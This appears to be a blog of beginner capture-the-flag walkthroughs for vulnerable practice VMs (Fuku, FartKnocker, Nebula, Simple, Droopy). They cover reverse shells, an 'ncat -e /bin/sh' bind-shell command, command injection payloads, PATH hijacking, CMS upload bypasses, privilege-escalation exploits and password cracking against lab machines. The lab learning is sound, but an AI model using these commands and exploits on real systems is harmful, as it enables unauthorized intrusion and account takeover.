Walkthrough Fuku

I have just finished another VM. The very annoying, but fun, machine called Fuku. As in Fuck you, I guess. It was designed to really mess with the challenger.

Okay, so let’s get started.

So after scanning the machine I saw that all ports were open. But only ssh port 22 was a real service. I tried a few basic password on it, but I got blocket pretty fast. I am guessing some fail2ban serivce. The rest of the ports just outputed a FUKU note. So they were just false positives. So I wrote a python-script to try out every port possible. But that wasn’t easy. First I wrote it to check for the return-length. But that didn’t return anything. So that we quite annoying. And I also added multithread to be able to check the ports faster:

from multiprocessing.dummy import Pool as ThreadPool
pool = ThreadPool(2)
results = pool.map(testPorts, minArr)

SO then I had to rewrite the script to make a get-request instead. Anyhow, I found the joomla service on port 13370 after a lot of work. And I ran joomscan on it and found a lot of vulnerabilities. Especially a vulnerability that creates a admin-user for you. So I did that. Here is the exploit I used: https://www.exploit-db.com/exploits/6234/

The page was in japanese, but it wasn’t that hard to create the admin-user. But once I was in it was really difficult to understand what was going on. I though I changed the language so many times. And I tried to change it. At one point I thought english had been removed completely just for the sake of FUKU. But in the end I found it.

Then came the next challenge. How to upload a shell. I tried to turn off all forms of editors to be able to insert php, but nothing worked. So I tried to enable ftp, but that didn’t work since that port was already in use. I tried to upload a shell through the media-uploads, but that blocked the code. So after some heacy googeling on how to run php I ended up installning the DirectPhp-plugin. This one: http://www.kksou.com/php-gtk2/joomla/directphp-plugin.php#download

So I uploaded my reverse-shell and got in.

The first thing I wanted to do was to spawn a shell:

$ python -c 'import pty; pty.spawn("/bin/sh")'
haha! FUKU! Only root can run that command.

That together with a few other commands was blocked. And since I couldn’t get a tty-shell I was unable to use sudo and su.

So I started to mess around with the mysql-database. Which was quite difficult without a tty-shell. It was really buggy. Oh yeah, I found the mysql-login credencials in configuration.php in /var/www/html. So I looked around in the databse fuku and found gizmos user. So I got the hash and cracked it with hashcat.

hashcat -m 11 -a 0 -o found.txt admin.hash /usr/share/hashcat/rules/rockyou-30000.rule

Only to find that gizmo used the same password to his user as for the database. sillyboy. So that was not so useful. There was also another admin-user and a admin-account in tacacs. “admin ht70zyjHsMl3A”.

So I transfered my enumeration-script and started enumerating. I found that it was a ubuntu-15.04 machine. So I figured to could try the standard overlay-exploits that work on quite a few ubuntus. But gcc was somehow blocked.

www-data@Fuku:/tmp$ gcc exp.c -o exp
gcc exp.c -o exp
haha! FUKU! Only root can run that command.

So I compiled the the exploit on my machine and then did a wget to transfer it. But it wouldn’t run since www-data lacked certain rights.

Then I got stuck for quite some time. ANd I cheated a bit, just to read the words chrootkit. So I found that program running and I looked for an exploit for it. And found this: https://www.exploit-db.com/exploits/33899/
Pretty crazy exploit. A incredible priv-esc exploit from a program that attempts to stop rootkits. So after a few trial and error with using the exploit I finally just wrote:

echo "echo root:adminadmin | chpasswd" > update

And then I logged in using ssh. But that was after going a bit crazy in trying to get a tty-shell for www-data. So that was it. I got root and the flag.

Yep, this is a flag. It's worth over 9000 Internet points!
Random keyboard smash: lkhI6u%RdFEtDjJKIuuiI7i&*iuGf)8$d4gfh%4

In the root-folder was all the programs and rools that I was blocked from using.

19700101      chkrootkit-0.49  flag.txt  g++-4.9  gcc-4.9  gcc-ar-4.9  gcc-nm-4.9  gcc-ranlib-4.9  ifconfig  mlocate    python     uname  whoami
change_ip.sh  cpp-4.9          fuku      gcc      gcc-ar   gcc-nm      gcc-ranlib  id              locate    portspoof  python2.7  which


I spent a lot of time writing the python-script. So that was a good learning-experience. Finding the chrootkit-was probably the hardest. I should have seen that it was a unusual service. All in all a really fun challenge! Thanks https://www.vulnhub.com/author/robert-winkel,190/ Robert Winkel for the machine! Frustrating but fun!

Walkthrough FartKnocker

Another VM is done. Here is the writeup. And here is the link to the VM on vulnhub.


$ netdiscover -r   08:00:27:3d:0d:c8      1      60  Cadmus Computer System

The Nmap-scan.

Not shown: 65534 closed ports
Reason: 65534 resets
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:3D:0D:C8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
TCP/IP fingerprint:

So port 80 is the only one open. An interesting little detail here is that it says that it found “65534 closed ports”, and then it says: Reason: 65534 resets. I think that means that the server has responded with RST/ACK. Something I learned in this challenge. But we will get to that.

On port 80 we find a file named pcap1.pcap. So I open it up in wireshark.
To the experienced packet-inspector I guess that it is quite obvious what is going on in this packet-capture. But I had never heard about port-knocking. So I got lost on a detour for quite some time. I was inspecting the ICMP-packets. All of those packets ended with “!”#$%&'()*+,-./01234567”. Something that I though was suspicious. So I started googeling about hacks that use ICMP and found a lot.

It turns out that you can use the ICMP-protocol to hide, or tunnel, other services. So I thought that someone had injected a Loki-rootkit into the server, and what I was observing was the communication between the hacker (with ip …102) and the victim-server. And that I was supposed to enter through the same exploit. But after going through the ICMP-packets in detail I realized that they really were just pings, and nothing else. They never contained more data than the default “!”#$%&'()*+,-./01234567”, which I learned could be used to fingerprint the server. This data meant that the server probably was a linux. So after discarding all the ICMP packets I started to look into the TCP-packets more closely. And after some creative googeling about ports I learned about port-knocking.

Port knocking

So I downloaded knockd, that is used to implement port-knocking. And I got it to work by running this command:

knock 7000 8000 9000
nc 8888

This also worked:

for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x; done
nc 8888

And this:

nc 7000
nc 8000
nc 9000
nc 8888

Anyways, it lead me to this address: /burgerworld. I downloaded the pcap-file and continued. I went through each and every packet in detail to understand how they all worked. But I am not going to bore you with that. So I right-clicked on a TCP-packet and then clicked on follow tcp-stream. And it showed me a nice ascii-image of beavis (or butthead, can’t remember who’s who). And the text: eins drei drei sieben. So I google-translated the text, and it was what I though, the classic number 1337. So after trying every single possible combination of portknocking I finally figured out that it was supposed to be 1 3 3 7. And then nc to port 1337. There I found: /iamcornholio/ which gave me this text:

“huhhuhhh…Hey Beavis…Im all about uhhh…huhuh…that base huhhuhhh…

So the base-comment made me think that it was probably base64-encoded. And it was.

It translated into: Open up SSH: 8888 9999 7777 6666
So I knocked the port and got access to port 22.

$ ssh root@                                                   1 ↵
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:uSdkKIWXcJl0j0P5Y+cAzjD9CJOFQ/NxtG8kz8ptzFE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
# USERNAME: butthead                       #
# PASSWORD: nachosrule                     #

So I logged in as butthead, but was immedietly thrown out.

From doing some challenges on overthewire I learned that you can execute commands with SSH without getting an actual shell.

But first I downloaded sshpass to be able to make the process a bit easier, and then:

sshpass -p nachosrule ssh butthead@ ls

So then I used nc to get a permanent shell.

$ sshpass -p nachosrule ssh butthead@ "ncat -e /bin/sh 1234"


So I got a shell, and it was time to escalate.
I ran the linEnum.sh script and waded through the info. And checked for vulns on sudo. But nothing really of interest. Some meaningless tuff in /tmp, some scripts in beavis. Then I found pcap3 and pcap4. That I studied thoroughly. In pcap4 I saw that there was some ssh-keychanges going on, and some encrypted data-transfer. But after some googeling I concluded that there is not really any way I could possibly break that. SSH with Diffie-hellman seems pretty waterproof.

In the end I ended up running the Ubuntu 14 priv-exploit that I have used on some other VM:s. This one: https://www.exploit-db.com/exploits/37292/. That exploit really is incredible/incredibly dangerous.

So I became root and got the SECRETZ in /root.


Packet-analysis really was awesome. A lot of fun and interesting stuff. I feel like I have really started to get a grip of how packets are structured, and started to get to know Wireshark a lot more. So the main takeaways from this VM really was learning packet-analysis and about port-knocking.

Thanks to top-hat-sec for another great VM!

After reading other writeups I learned about https://digi.ninja/projects/cewl.php. Which I am really excited about trying out. Gonna try it soon.

Nebula Walkthrough

I started doing the challenges in Nebula. They are not as fun as boot2root VM:s but still entertaining. And I have learned some new stuff from it.
I have decided to write down all the levels in this one post, otherwise it would be too many short posts. So this is going to be a giant one, and sometimes way to much detail, and somtimes not enough, of well. Let’s start.

Level 00

We just need to find the flag on this level.

$ find / -user flag00 -perm -4000 -exec ls -ldb {} \; 2>/dev/null
-rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 /bin/.../flag00
-rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 /rofs/bin/.../flag00

Search for user flag00, with permission 4000, executable. List the
output. Throw stderr in /dev/null.

cd /bin
cd "..."

Level 01

On this level we are provided with code written in C and the binary version of it. It can be found here: /home/flag01/flag01

$ file flag01
flag01: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped

So we know that it is a 32bit setuid-binary. So when we run the binary the code that gets executed gets executed as the user flag01.

total 13
drwxr-x--- 2 flag01 level01   92 2011-11-20 21:22 .
drwxr-xr-x 1 root   root     100 2012-08-27 07:18 ..
-rw-r--r-- 1 flag01 flag01   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag01 flag01  3353 2011-05-18 02:54 .bashrc
-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01
-rw-r--r-- 1 flag01 flag01   675 2011-05-18 02:54 .profile

Since I am a total noob in C I am going to comment this code pretty heavy to understand what is going on.

#include <stdlib.h>
// This is what is says. C's standard library. Useful general
// purpose functions. Generating random numbers, conversions, memory allocation: malloc
// process control. It is from this lib that "system" is taken.

#include <unistd.h>
// Provides access to POSIX API.
// Gives the programmer access to NULL pointer, and symbolic constants like SEEK_SET

#include <string.h>
// A library for manipulating strings.

#include <sys/types.h>
// This library gives access to different data-types. Like gid_t.

#include <stdio.h>
// The standard input and output library.
// printf and scanf are among those functions. printf outputs, and scanf takes input.

int main(int argc, char **argv, char **envp)
// Here we initiate the main function, we do this with three arguments.
// argc is the number of argumnets. Argument count. The count starts from the
// calling of the binary. So ./flag01 is the first argument.
// argv are the argumnets that the user inputs. In this program it appears to be none.
// envp is an array of the environment variables.

  gid_t gid;
  uid_t uid;
// Here we declare two variables, but we don't assign them any value.
// We use the data-typs that come from sys/types-lib.
// The data-types are group-id and user-id.

  gid = getegid();
  uid = geteuid();

// This gets the group-id and user-id of the current user. Which is flag01.
// And we assign the the value to the previously created variables.

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

// So this sets the real, effective and saved uID.

  system("/usr/bin/env echo and now what?");

// This uses the system-function, which let us use the unix-commands/programs.
// The commands run are first printing the environment variables, and then it echos "and now what?"


How can this then be exploited? Since there is no user-input.
So I figure that I can overwrite the echo-command with a command that I call echo, but does something else.

This kind of explains the way to do this.

So I wrote that program in bash


Then chmod +x echo, and export PATH=/tmp:$PATH. Now, it is important here to add the echo to the beginning of the PATH-variable, otherwise it will execute the normal echo.


We got the flag!

Level 02

So on this level we have another setuid to play with.

cd /home/flag02
level02@nebula:/home/flag02$ file flag02
flag02: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped

Let’s run it and see what happens.

level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo level02 is cool")
level02 is cool

This looks a bit like the first level. But let’s analyze the code.

#include <stdlib.h>
// Standard-lib.

#include <unistd.h>
// Lib to get getegid()

#include <string.h>
// Lib to manipulate strings

#include <sys/types.h>
// Get new data-types, like gid_t

#include <stdio.h>
// Standard i/o. printf, scanf for example

int main(int argc, char **argv, char **envp)
  char *buffer;

// Declare the variable buffer.

  gid_t gid;
  uid_t uid;

// Declare variables.

  gid = getegid();
  uid = geteuid();

// Assign uID and gID into the created varibles.

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

// Set UID.

  buffer = NULL;

// Assign the value NULL to the buffer-varible.

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
// Lets break it down.
// asprintf auto-allocate memory, it doesn't have to receive a specific buffer-size.
// it acquires it dynamically. In a way it is a way to defend against buffer overflow. Since the buffer cant be overflown because it is dynamic, I think.
// asprinf calculates the length of the string, allocates the amount of memory
// and then writes the string into that memory.

  printf("about to call system(\"%s\")\n", buffer);

// So, the asprintf takes the getenv-username and inputs it into the buffer.
// Then we make a system-call using that buffer.


Okay, so no user-input is possible. So the solution will be elsewhere.
So we make a system-call that is the following:
“/bin/echo username (taken from en-var) is cool”

So the solution that comes to mind is to insert a username that would be something like
the following: hello && /bin/bash # echo

So I set the username in my environment variable like this:

USER="&& /bin/bash #"

Then I ran the script, and it gave me the shell, and
then I could just run getflag.

Level 03

So on this level we have one file and one directory.

level03@nebula:/home/flag03$ ls -lah
total 5.5K
drwxr-x--- 3 flag03 level03  103 2011-11-20 20:39 .
drwxr-xr-x 1 root   root     180 2012-08-27 07:18 ..
-rw-r--r-- 1 flag03 flag03   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag03 flag03  3.3K 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag03 flag03   675 2011-05-18 02:54 .profile
drwxrwxrwx 2 flag03 flag03     3 2012-08-18 05:24 writable.d
-rwxr-xr-x 1 flag03 flag03    98 2011-11-20 21:22 writable.sh

The dir is read and writable. And the writable.sh-file looks like this:

for i in /home/flag03/writable.d/* ; 
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"

So here we can se that it takes all the scripts in writable.d and executes them, every few minutes, with a cronjob.
So after a lot of work, and a lot of testing. Like copying the sh and much other. i realized I didn’t have to get a shell, all i need is to execute getflag on the machine.

So I just wrote the following script:

getflag > /tmp/flaggan.txt

I also tried to copy the shell from the flag03-user and give me permissions to use it, but it didn’t work. Not really sure why. But anyways, I got the flag.

Level 04

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it 🙂
To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.”

#include <stdlib.h>
// Standard lib

#include <unistd.h>
// getresid comes from here i think

#include <string.h>
// Lib to manipulate strings

#include <sys/types.h>
// Includes the datatype guid

#include <stdio.h>
// Standard I/O

#include <fcntl.h>
// The file control-options.
// To input output files, open them, close them, open dirs etc

int main(int argc, char **argv, char **envp)
  char buf[1024];
// Here the buffer. The buffer is a kind of intermediare between memory and program.
// So the buffer have a maximum of 1024 bytes. That is one kilobyte.

  int fd, rc;
// Here we declare two variables.

  if(argc == 1) {
    // What to do if there is only one cli-argument.
      printf("%s [file to read]\n", argv[0]);
    // EXIT_FAILURE comes from some std lib.
    // This seems to be mostly harmless.

  if(strstr(argv[1], "token") != NULL) {
    // So this occurs only if the variable name is token.
    // strstr evaluates if the first argument contains anything from the second.
    // So we can't ever read any file that contains the word token in it.
      printf("You may not access '%s'\n", argv[1]);

  fd = open(argv[1], O_RDONLY);
  // Here we initialize and declare the fd variable.
  // It appears to open the file, in a read-only manner, and then save it in
  // the variable fd.

  if(fd == -1) {
    // This statement fires if a file doesn't exist, I think.
      err(EXIT_FAILURE, "Unable to open %s", argv[1]);

  rc = read(fd, buf, sizeof(buf));

// So here we take the input file, and read it. The buffer-size is here.

  if(rc == -1) {
    // If the file somehow doesn't exists it throws this error.
      err(EXIT_FAILURE, "Unable to read fd %d", fd);

  write(1, buf, rc);
  // Here we write to standard out (the 1 indicates it).

I started trying to encode the file name and some other stuff, that didn’t work. Then it hit me. I can just create a link.

level04@nebula:/tmp/04$ ln -s /home/flag04/token ./test
level04@nebula:/tmp/04$ ls
test  test.sh
level04@nebula:/tmp/04$ /home/flag04/flag04 ./test

Wohoo, it worked!

Level 5

Check the flag05 home directory. You are looking for weak directory permissions
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.

So I just read the files.

level05@nebula:/home/flag05/.backup$ tar -Oxf backup-19072011.tgz .ssh/id_rsa.pub

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLAINcUvucamDG5PzLxljLOJ/nrkzot7EQJ9pEWXoQJC0/ZWm+ezhFHQd5UWlkwPZ2FBDvqxdcrgmmHT/FVGBjK0XWGwIkuJ50nf5pbJExi2SC9kNMMMP2VgY/OxvcUuoGhzEISlgkuu4hJjVh3NeliAgERVzxKCrxSvW48wcAxg4v5vceBra6lY7u8FT2D3VIsHogzKN77Z2g7k2qY82A0vOqw82e/h6IXLjpYwBur0rm0/u3GFB1HFhnAxuGcn4IsnQSBdQCB2S+eOUZ4PmiQ/rUSHuVvMeLCzrxKR+UG9zDwoCwwXpNJehAQJGCiL3JzBNnLjFaylSqKP6xj7cR user@wwwbugs
level05@nebula:/home/flag05/.backup$ tar -Oxf backup-19072011.tgz .ssh/id_rsa

Then I saved it down and sshed into the flag-user.

level05@nebula:/tmp/05/.ssh$ ssh -i id_rsa flag05@

Level 06

Old unix-passord-config. Okay, I know that passowrd were stored in /etc/passwd before they where stored in shadow.

cat /etc/passwd

Looks like it can be done with john the ripper.

So I just copy-pasted the hash into a file and then ran john on it like this

 $ john level06Hash
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 AVX-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
hello            (?)
1g 0:00:00:00 DONE 2/3 (2016-05-08 11:29) 2.777g/s 355.5p/s 355.5c/s 355.5C/s 123456..marley
Use the "--show" option to display all of the cracked passwords reliably
Session completed

So that was easy.

Level 07

This level was a bit tricky. It is about teching command injection.
So these articles were really useful.

So we have a few files.
.lesshst – that the history from the program less

level07@nebula:~$ cat .viminfo
# File marks:
'0  1  0  ~/index.cgi?Host=|getflag|
'1  1  0  ~/index.cgi

# Jumplist (newest first):
-'  1  0  ~/index.cgi?Host=|getflag|
-'  1  0  ~/index.cgi
-'  1  0  ~/index.cgi

# History of marks within files (newest to oldest):

> ~/index.cgi?Host=|getflag|
	"	1	0

And here is the cgi-code.


  use CGI qw{param};

  print "Content-type: text/html\n\n";

  sub ping {
    $host = $_[0];

    print("<html><head><title>Ping results</title></head><body><pre>");

    @output = `ping -c 3 $host 2>&1`;
    foreach $line (@output) { print "$line"; }



  # check if Host set. if not, display normal page, etc


I had never really looked at perl-code before. But it kind of made some sense I guess.

The config-file specified a port

# Specifies an alternate port number to listen on.

So I found that port, and started curling to se what I could run. After a lot of trial and error
I found a way to do it:

curl “http://nebula.dev:7007/index.cgi?Host=www.google.com|getflag”
I also learned that you have to encode spaces correct otherwise the sever will get all confused. So if you wanna run any command with spaces you do it like this:

I had to encode the semicolon. That was the key to it!

Level 08

This is for sure my favorite level so far. I really enjoy analyzing packets.
So first I moved the pcap-file to my computer with netcat, and then I opened it up in wireshark.

There was no http-requests. So I guess this traffic was not on the web.

There are two machines talking: – 39247 – 12121

So looking at the packets we can tell that the machines are in Bejing, both of them. The source and destination corrdinates show that they are in the same place.
After looking up the ports I found this:

12121 	tcp 	trojans 	Backdoor.Balkart (2004.09.02) - a backdoor trojan horse that can act as a HTTP proxy or FTP server

Port is also IANA registered for NuPaper Session Service 	SG
12121 	tcp,udp 	nupaper-ss 	NuPaper Session Service 	IANA
12121 	tcp 	threat 	Balkart

Even though it doesn’t really say in the challenge what kind of traffic this is, I like to image that it was someone who had infected the 12121 computer with the Balkart-trojan. This one. But it doesn’t really matter, it is irrelevant for this challenge.

So I went over the packets and found some interesting ones.

 0000   ff fa 20 00 33 38 34 30 30 2c 33 38 34 30 30 ff  .. .38400,38400.
 0010   f0 ff fa 23 00 53 6f 64 61 43 61 6e 3a 30 ff f0  ...#.SodaCan:0..
 0020   ff fa 27 00 00 44 49 53 50 4c 41 59 01 53 6f 64  ..'..DISPLAY.Sod
 0030   61 43 61 6e 3a 30 ff f0 ff fa 18 00 78 74 65 72  aCan:0......xter
 0040   6d ff f0                                         m..

  ""bb	B

But I couldn’t piece it all together. So after analyzing every single poacker separtely, I realized that the packages come and go in different
order, an order that doesn’t make sense. So I learned something reaally useful. Right-click on a package and then
click on: follow, and then tcp-stream. This way we can see the full interaction, all packets combined to one.

..%..%..&..... ..#..'..$..&..... ..#..'..$.. .....#.....'........... .38400,38400....#.SodaCan:0....'..DISPLAY.SodaCan:0......xterm.........."........!........"..".....b........b....	B.
..............................1.......!.."......"......!..........."........"..".............	..
Linux 2.6.38-8-generic-pae (::ffff: (pts/10)

..wwwbugs login: l.le.ev.ve.el.l8.8
Password: backdoor...00Rm8.ate

Password: backd00Rmate
Login incorrect
wwwbugs login:

So the password looked pretty strange. And it didn’t work. But after I checked the tcp-stram in hex it became clear that the dot’s in the password was f7 in hex. f7 represents DEL. So every f7 was the user deleting letters. I guess he/she has problem remembering his/her own password.
So this:
Password: backdoor…00Rm8.ate
Became this:
Password: backd00Rmate

Level 09

I will continue some other day.

Walkthrough Simple

I tried out another vulnerable machine. This one was called Simple. And can be found here.

So I started out as usual by locating the machine.

 $ netdiscover -r 
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                                                   2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120                                                                                     
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------     e8:de:27:31:15:ee      1      60  TP-LINK TECHNOLOGIES CO.,LTD.                                                                08:00:27:60:21:5c      1      60  Cadmus Computer Systems       
nmap -A -O -T4 -p- -vv 

Only port 80 open. Si I browser over there.
I was met by an the interface of some kind of new-service called CuteNews. It had the version written on the first page. CuteNews v.2.0.3. And what I had learned from the last VM I did was that it is always a good idea to search for exploits (duh). So before going a head with dirbuster/zap/nikto/whatevs I just searched fore CuteNews in exploit-db. And that was a great idea.
So I just checked out the very first that came up, and it looked easy. It was this one. So I went ahead and created and account, renamed my php-reverse-shell.php to shell.jpg. Then I intercepted it with burp-suite and changed the name back to php.
And then I just started nc with nv -lvp 4444. And after visiting: cutenews.dev/uploads/avatar_username_shell.php I was rewarded with a shell.
I sent over my enumeration-script that I am working on with netcat.

nc -lvp 3333 > enum.sh
nc < enum.sh

I soon found out that it has the same privesc-vulnerability as the machine I was working on the other day. So I already had the exploit ready to go. It was this one. I sent it over with netcat and then compiled it with gcc, then chmod +x. And then I was root, and got the flag in the /root folder.



I felt like all the hard work before really payed off on this one. I knew the exploits, I knew how to transfer files easily. This was a great little project.

Walkthrough Droopy

Another walkthrough. This time for the Droopy-vm. It can be found here on vulnhub.com

I tried out netdiscover, just to learn something new. I have seen that other people use it. It turns out that it works to find hosts on the network. It works by sending out ARP-requests throughout the network and loggin the requests. I am not really sure if nmap is using a different technique. But it is good to know that there is an alternative to nmap for it.

netdiscover -r
 Currently scanning: Finished!   |   Screen View: Unique
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120                                                                                     
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------     e8:de:27:31:15:ee      1      60  TP-LINK TECHNOLOGIES CO.,LTD.                                                                08:00:27:65:24:9c      1      60  Cadmus Computer Systems 

So I ran nmap.

nmap -vvv -A -T4 -O

80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries 
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php 
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/ 
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/ 
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/ 
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud...
MAC Address: 08:00:27:65:24:9C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4

First I thought that the MD5 was a flag or something. But then I read that that is the standard way for nmap to output if it doesn’t know the service.

The robots file is just filled with stuff.

Among the many files was this.
Drupal 7.30, 2014-07-24

This reminded me about a huge vulnerability that was in drupal a few years ago, that I had heard about.

I continued the scanning by running nikto and then checking out the info.php file to see what I could find.

This is some of all the info.

PHP Version 5.5.9-1ubuntu4.5
Hostname:Port droopy.knight139.co.uk:80 
User/Group www-data(33)/33 
Apache Version Apache/2.4.7 (Ubuntu) 
Loaded Modules core mod_so mod_watchdog http_core mod_log_config mod_logio mod_version mod_unixd mod_access_compat mod_alias mod_auth_basic mod_authn_core mod_authn_file mod_authz_core mod_authz_host mod_authz_user mod_autoindex mod_deflate mod_dir mod_env mod_filter mod_mime prefork mod_negotiation mod_php5 mod_rewrite mod_setenvif mod_status 

DOCUMENT_ROOT /var/www/html 
SERVER_ADMIN webmaster@localhost 

Client API version 5.5.40 

PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 

The default apache-page was also found.

I tried to brute-force the login. This made the server block my IP. And I also think I made it run out of memory or something. Because is subsequently crashed. Great. So I restarted the VM fresh again. And this time I checked out the drupal-exploit.

So I searched for exploits on the exploits-database.
There I found four exploits that are called something along the lines of: Drupal Core <= 7.32 – SQL Injection.
Or similar. Two were written in python two in php. I just picked one, and downloaded it and ran it. Which was pretty stupid, because I created, by default in the exploit, a user with the username admin. So I overwrote the original user.
So once I later gained access, and checked in the database. I only found my own user. Otherwise I would have been able to crack the hash of the original user and that password could have been good to know.

Anyhow, I gained access and after some googeling I figured out how to allow php in drupal (modules/php-filter). And I uploaded the php-reverse-shell.ph that I found here:

Privilege escalation

Now I had shell for user: www-data. So I went to /tmp and started netcat to transfer my enumeration-file.

nc -lvp 3333 > enum.sh

Then I sent the file with:

nc 3333 < enum.sh

Then: chmod +x enum.sh

Among other things I found:

uid=1000(gsuser) gid=1000(gsuser) groups=1000(gsuser),24(cdrom),30(dip),46(plugdev),110(lpadmin
hostname is:
#In the hosts file I find this.	droopy.knight139.co.uk	droopy

I remembered that every web-server that runs mysql has the logins for it in some file. So after some snooping-around I found the file:


$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'nimda',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',

So I log in to mysql.

mysql -u drupaluser -p drupal
password: nimda

SHOW tables;

mysql> SELECT * FROM users;
SELECT * FROM users;


So I went here: http://www.onlinehashcrack.com/hash-identification.php#res
To identify what type of hash it was.

It turns out it is a SHA-512.
– SHA-512(Drupal)

I study the commands of hashcat and found this:

hashcat -m 7900 -a 0 -o found.txt admin.hash /usr/share/hashcat/rules/rockyou-30000.rule

7900 is the drupal-mode.

Meanwhile I continue to look around and found an email in /var/spool/mail:

From Dave <dave@droopy.example.com> Wed Thu 14 Apr 04:34:39 2016
Date: 14 Apr 2016 04:34:39 +0100
From: Dave <dave@droopy.example.com>
Subject: rockyou with a nice hat!
Message-ID: <730262568@example.com>
X-IMAP: 0080081351 0000002016
Status: NN


   I've updated the encrypted file... You didn't leave any
hints for me. The password isn't longer than 11 characters
and anyway, we know what academy we went to, don't you...?

I'm sure you'll figure it out it won't rockyou too much!

If you are still struggling, remember that song by The Jam


Okay, so it talks about an encrypted file. From a guy named Dave.

It looks like the encrypted file can be decrypted with a password that is found in the rockyou dictionary.
We also know that the password is less than 11 characters, and it has something to do with an academy.
And it is also the name of a song by the Jam.

So I started listening to some songs by The Jam a start looking for the encrypted file. But I couldn’t really find anything useful.

After some minor cheating I learn that it is a good idea to look for privilege-escalation exploits. So I search exploit-database again and find several exploits. I download this one: https://www.exploit-db.com/exploits/37292/
Transfered it over to the VM with nc. Then gcc, chmod and execute, and now I am root. BOOM! Fast when stuff just works.

In /root i found a file called dave.tc.
After some googeling I found out that .tc probably is a true-crypt file. And after some more googeling I learned that there is a program called truecrack.
After a lot of struggling I found that with sed we can remove all words in our dictionary that are shorter than 11 characters.

I did it with this command.
The -i flag is important. It makes the changes in the current file. Without it nothing happens. As I learned.

sed -i -r '/^.{0,10}$/d' rr.txt   

So now we have a list with 1.8 millions.
wc -l rr.txt
1879453 rr.txt

Then I did
grep acade rr.txt > rr2.txt

To get all words containing the work academy. As it was mentioned in the email.

Then again:

truecrack -t dave.tc -k sha512 -b 8 -w rr2.txt -v 

Found password:		"etonacademy"
Password length:	"12"

On this page I learned how to mount a truecrypt-volume. So I did that.

mkdir /media/dave

mount /dev/mapper/dave /media/dave
ls /media/dave/
buller  lost+found  panama

In the buller dir there is a file called bullingdon-crest.

Now I get it. The Dave character is David Cameron. And I guess the shares.jpg refers to his corrupt family’s holdings in off-shore banks. And the pig in .secret is of course the infamous pig he most likely fucked. And in the .top dir is the flag. Pretty clever ending to a great VM!


So on this VM I really learned a lot!
The most important thing I think was: always check the exploit-database!
All it really took was to search for two exploits to gain root. First to enter drupal-admin and then to elevate to root.

I really liked it because it felt very real. The drupal and priv-escalation exploits are both very real. Thanks to knightmare for a great VM!

Walkthrough SkyDog Con CTF – The Legend Begins

Okay, I wish I could say that I really solved this but I didn’t get all the flags. But I am going to do a write up anyways, to not forget what I learned.

The CTF is called SkyDog Con CTF – The Legend Begins, and can be found here. Thanks James Bower for a fun CTF!


